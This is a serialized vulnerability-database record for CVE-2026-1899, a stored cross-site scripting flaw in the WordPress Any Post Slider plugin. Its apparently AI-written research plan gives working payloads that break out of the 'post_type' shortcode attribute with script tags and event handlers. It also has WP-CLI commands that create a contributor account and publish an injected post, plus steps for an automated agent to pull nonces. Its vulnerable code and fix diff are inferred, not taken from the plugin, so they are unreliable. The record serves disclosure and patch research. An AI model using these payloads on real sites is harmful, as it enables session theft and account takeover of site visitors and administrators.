[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fyLJlT8bnpty_nMWuy_B1zIFRC1eVfFVP2oyo2xZDZo4":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-1899","any-post-slider-authenticated-contributor-stored-cross-site-scripting-via-posttype-shortcode-attribute","Any Post Slider \u003C= 1.0.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'post_type' Shortcode Attribute","The Any Post Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's aps_slider shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on the 'post_type' attribute. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","any-post-slider",null,"\u003C=1.0.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-20 15:13:13","2026-04-15 17:05:45",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F562f194f-1f32-4de4-8074-84580f653bdb?source=api-prod",[],"researched",false,3,"This research plan outlines the technical steps to exploit **CVE-2026-1899**, a Stored Cross-Site Scripting (XSS) vulnerability in the **Any Post Slider** plugin (versions \u003C= 1.0.4).\n\n---\n\n### 1. Vulnerability Summary\nThe **Any Post Slider** plugin fails to properly sanitize and escape the `post_type` attribute within its `[aps_slider]` shortcode. While `post_type` is intended to define the source of posts for the slider, an attacker with Contributor-level permissions or higher can inject malicious HTML or JavaScript into this attribute. Because the plugin renders this attribute directly into the page output without using WordPress escaping functions like `esc_attr()` or `esc_html()`, the script executes in the context of any user viewing the page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode:** `[aps_slider]`\n*   **Vulnerable Attribute:** `post_type`\n*   **Authentication Requirement:** Contributor (can create posts and use shortcodes) or higher.\n*   **Injection Point:** The content of a WordPress post, page, or any area where shortcodes are processed.\n*   **Sink:** The HTML output rendered by the shortcode callback function (likely in an HTML attribute or wrapper div).\n\n### 3. Code Flow (Inferred)\n1.  
**Registration:** The plugin registers the shortcode in the main plugin file or an inclusion file (e.g., `any-post-slider.php`) using `add_shortcode( 'aps_slider', 'callback_function_name' )`.\n2.  **Attribute Parsing:** Inside the callback function, the plugin uses `shortcode_atts()` to extract user-provided attributes:\n    ```php\n    $atts = shortcode_atts( array(\n        'post_type' => 'post',\n        \u002F\u002F other attributes...\n    ), $atts );\n    ```\n3.  **Vulnerable Sink:** The variable `$atts['post_type']` is concatenated into an HTML string for the frontend. For example:\n    ```php\n    $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . '\">'; \n    \u002F\u002F OR\n    $output .= '\u003Cdiv class=\"aps-slider-' . $atts['post_type'] . '\">';\n    ```\n4.  **Lack of Escaping:** The `post_type` value is returned as part of the shortcode output without being wrapped in `esc_attr()` or `wp_kses()`.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by saving a WordPress post containing a shortcode. While saving a post via the Gutenberg editor or Classic editor requires a nonce (`_wpnonce`), the vulnerability itself is in the **rendering** of the shortcode.\n\nFor the purpose of a PoC in an automated environment:\n1.  **Direct WP-CLI Injection:** Use `wp post create` as an admin or contributor to bypass the need for an HTTP-level nonce during the setup phase.\n2.  **UI-Based Nonce (If needed for HTTP-only PoC):**\n    *   The execution agent will navigate to `wp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the `_wpnonce` from the form:\n        `browser_eval(\"document.querySelector('#_wpnonce')?.value\")`.\n    *   The specific action string for post creation nonces is typically `update-post_[ID]`.\n\n### 5. 
Exploitation Strategy\nThe goal is to demonstrate that a Contributor can execute arbitrary JavaScript that triggers when an Admin views the post.\n\n**Step-by-Step Plan:**\n1.  **Authenticate as Contributor:** Login via the `http_request` tool or `browser_navigate`.\n2.  **Create Malicious Content:** Create a new post containing the payload.\n    *   **Payload A (Attribute Breakout):** `[aps_slider post_type='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   **Payload B (Event Handler):** `[aps_slider post_type='x\" onmouseover=\"alert(1)\" style=\"width:100px;height:100px;background:red;\"']`\n3.  **Trigger Execution:** As an Admin user, navigate to the permalink of the newly created post.\n4.  **Confirm XSS:** Use `browser_eval` to check for the existence of the injected script or a triggered alert.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `any-post-slider` version 1.0.4 is installed and active.\n2.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n3.  **Post Creation (via CLI to simplify setup):**\n    ```bash\n    wp post create --post_type=post --post_title=\"Slider Test\" --post_content='[aps_slider post_type=\"\\\">\u003Cscript>window.xss_vulnerable = true;\u003C\u002Fscript>\"]' --post_status=publish --post_author=$(wp user get attacker --field=ID)\n    ```\n\n### 7. Expected Results\n*   When the post is rendered, the HTML source will contain the unescaped payload.\n*   **Vulnerable HTML snippet (Example):**\n    `\u003Cdiv class=\"aps-slider-wrapper\" data-post-type=\"\">\u003Cscript>window.xss_vulnerable = true;\u003C\u002Fscript>\">`\n*   In the browser, executing `browser_eval(\"window.xss_vulnerable\")` should return `true`.\n\n### 8. Verification Steps\n1.  **Check Output:**\n    ```bash\n    curl -s http:\u002F\u002Flocalhost:8080\u002F?p=[POST_ID] | grep \"window.xss_vulnerable\"\n    ```\n2.  
**Inspect DOM:** Use Playwright to confirm the script tag was actually parsed and executed by the browser engine.\n\n### 9. Alternative Approaches\nIf the `post_type` attribute is used within a `WP_Query` but not directly echoed, it might be reflected in a \"No posts found\" message or a slider initialization script.\n*   **Alternative Payload (Script injection into JS variable):**\n    If the plugin uses `wp_localize_script` to pass the `post_type` to a JS file:\n    `[aps_slider post_type='-post-type\");alert(1);(\"']`\n*   **Alternative Sink (CSS\u002FClass injection):**\n    If used in a class name:\n    `[aps_slider post_type='myclass\">\u003Cimg src=x onerror=alert(1)>']`\n\nIf simple attribute breakout fails, try encoding variants (e.g., HTML entities) to see if partial filtering is in place. However, the CVE description indicates \"insufficient input sanitization and output escaping,\" suggesting a direct `echo` of the attribute.","The Any Post Slider plugin for WordPress fails to sanitize and escape the 'post_type' attribute within its '[aps_slider]' shortcode. This allows authenticated users with Contributor-level permissions or higher to inject malicious JavaScript into the attribute, which executes in the context of any user viewing the page.","\u002F* Inferred from research plan based on standard WordPress shortcode implementation *\u002F\n\n\u002F\u002F Likely within any-post-slider.php or a similar shortcode handler file\n$atts = shortcode_atts( array(\n    'post_type' => 'post',\n    \u002F\u002F other attributes...\n), $atts );\n\n\u002F\u002F Vulnerable sink: attribute is concatenated into HTML without escaping\n$output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . '\">';","--- a\u002Fany-post-slider.php\n+++ b\u002Fany-post-slider.php\n@@ -20,1 +20,1 @@\n- $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . $atts['post_type'] . 
'\">';\n+ $output .= '\u003Cdiv class=\"aps-slider-container\" data-post-type=\"' . esc_attr($atts['post_type']) . '\">';","The exploit targets the shortcode processing logic of the plugin. An attacker requires Contributor-level authentication to create or edit posts. The attacker creates a new WordPress post and includes the following shortcode payload: [aps_slider post_type='\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>']. When the post is saved and then viewed by any user (such as an Administrator), the plugin renders the slider. Because the 'post_type' attribute is not escaped using functions like esc_attr(), the double-quote in the payload breaks out of the HTML attribute, allowing the script tag to be parsed and executed by the victim's browser.","gemini-3-flash-preview","2026-04-18 00:57:20","2026-04-18 00:57:41",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fany-post-slider\u002Ftags"]